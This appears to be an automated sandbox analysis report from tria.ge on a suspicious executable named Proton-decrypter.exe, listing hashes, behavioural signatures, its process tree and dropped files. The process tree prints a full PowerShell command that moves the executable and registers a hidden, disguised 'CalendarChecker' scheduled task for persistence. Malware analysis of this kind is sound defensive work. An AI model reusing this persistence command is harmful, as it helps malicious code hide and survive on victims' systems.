Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

6

Static

static

3

Proton-decrypter.exe

windows7-x64

6

Proton-decrypter.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    117s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    18/01/2024, 20:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Proton-decrypter.exe

  • Size

    6.7MB

  • MD5

    3ab86f13c521e72bf4e8475ccd1e62e3

  • SHA1

    a1b2b1c4995ba4665d4db71653037f3075e111fb

  • SHA256

    37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9

  • SHA512

    a56fcf131a3de1a1395746edda0c038f9e39cfb63b8c96d788f9cb1c5d6a3f28d253543968a253b143bafd6ccc7f39ff8932097fca2a5e3076b87343afc8652b

  • SSDEEP

    49152:5vdi5Ifm0OErygxEb6Ns/CRptmctcmZxDit3KowoLGi9VDUIvR62BZrXDbS06DSi:cIHO7cifwIvRtSjRWipG5YF+Oz

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /PID 1256 /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Start-Process -FilePath "C:\Windows\Explorer.7z" -WindowStyle Minimized
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Windows\Explorer.7z"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2756
    • C:\Windows\system32\cmd.exe
      "cmd" /c start "" "C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.pdf"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.pdf"
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of SetWindowsHookEx
        PID:1892
    • C:\Windows\system32\schtasks.exe
      "schtasks" /query /tn CalendarChecker
      2⤵
        PID:1672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -Command " $random = New-Object System.Random; $interval = $random.Next(1, 4); $sys_min = [int](Get-Date -format \"mm\") + (60 / $interval); $sys_sec = [int](Get-Date -format \"ss\") + (60 / $interval); $envir = $env:LOCALAPPDATA; $spica = (Get-Process -Id (Get-WmiObject Win32_Process -Filter \"ProcessId=$PID\").ParentProcessId).ProcessName.Replace(\"\r\n\",\"\") + \".exe\"; $file_path = (Get-Command -Name \"./$spica\").Source; Move-Item -Path $file_path -Destination $envir -Force; $action = New-ScheduledTaskAction -Execute ($envir + \"\$spica\") -Argument \"-WindowStyle Hidden\"; $settings = New-ScheduledTaskSettingsSet -DeleteExpiredTaskAfter (New-TimeSpan -Seconds 30) -ExecutionTimeLimit (New-TimeSpan -Hours 3) -RestartCount:3 -RestartInterval (New-TimeSpan -Minutes 10); $settings.StartWhenAvailable = $true; $description = \"Calendar\"; $taskName = \"CalendarChecker\"; $settings.DisallowStartIfOnBatteries = $false; $settings.StopIfGoingOnBatteries = $false; $trigger = New-ScheduledTaskTrigger -Daily -At (Get-Date).addSeconds(10); $trigger.StartBoundary = (Get-Date).AddHours($interval).addMinutes($sys_min).addSeconds($sys_sec).ToString(\"s\"); $trigger.EndBoundary = (Get-Date).AddDays(2).ToString(\"s\"); Register-ScheduledTask -TaskName $taskName -Description $description -Action $action -Settings $settings -Trigger $trigger; "
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2912

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.pdf
      Filesize

      242KB

      MD5

      30a03040eeeb01b9d6ea7542712654da

      SHA1

      32767a0630e6b33d1355017e99b1b2cacd598093

      SHA256

      a949ec428116489f5e77cefc67fea475017e0f50d2289e17c3eb053072adcf24

      SHA512

      e204389f1cbfd74babeb948bab9e911a4565925996493a7aaf39cf2bb4d4d23a5ab5786eb829aa4b916582387e39f947f3a9fcf3edb240fc02832d26d860e4e9

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RUNV8AJ2J9WZYD8AJKM4.temp
      Filesize

      7KB

      MD5

      4564ca51b3659af058cb35196574663a

      SHA1

      66e715bf2803b9935ee23d0510f2a825142b35bd

      SHA256

      b71ef447eb75e11263a067f3855efe0e4b14de37e71d84e9ffddb12f4b0c595d

      SHA512

      81364d1bf874126f9d2e86b23ff3053656aca7361296831ee615917f033ff90acb35893ab3f5eb6a56b87bd69b1c61b01f7f171e46d53b7c357f45505d82b589

      Download Submit

    • C:\Windows\Explorer.7z
      Filesize

      66KB

      MD5

      e302b2076f95bdbfe8b39679a15e3ce3

      SHA1

      421710b728a323fbcc628316c4d41df291565157

      SHA256

      b073f44de8f68134bdcd05017e42978638c3dad50a69639b50aa5180341164d1

      SHA512

      7840a12ec275b762a4930ed349529cab4107308af17915418a19f49f11e3e413af81486e67c94ee6e44a44cfa9855e4a626739aaf1bea94b7fbc8bae2dd630c7

      Download Submit

    • memory/2804-33-0x00000000028E0000-0x0000000002960000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2804-20-0x000000001B340000-0x000000001B622000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2804-36-0x00000000028E0000-0x0000000002960000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2804-35-0x000007FEF6ED0000-0x000007FEF786D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2804-38-0x000007FEF6ED0000-0x000007FEF786D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2804-34-0x00000000028E0000-0x0000000002960000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2804-32-0x00000000028E0000-0x0000000002960000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2804-23-0x0000000002120000-0x0000000002128000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2804-30-0x000007FEF6ED0000-0x000007FEF786D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2912-48-0x0000000002BD0000-0x0000000002C50000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2912-46-0x0000000002010000-0x0000000002018000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2912-49-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2912-50-0x0000000002BD0000-0x0000000002C50000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2912-51-0x0000000002BD0000-0x0000000002C50000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2912-47-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2912-53-0x0000000002BD0000-0x0000000002C50000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2912-54-0x0000000002BD0000-0x0000000002C50000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2912-55-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2912-45-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

      Filesize

      2.9MB

      Download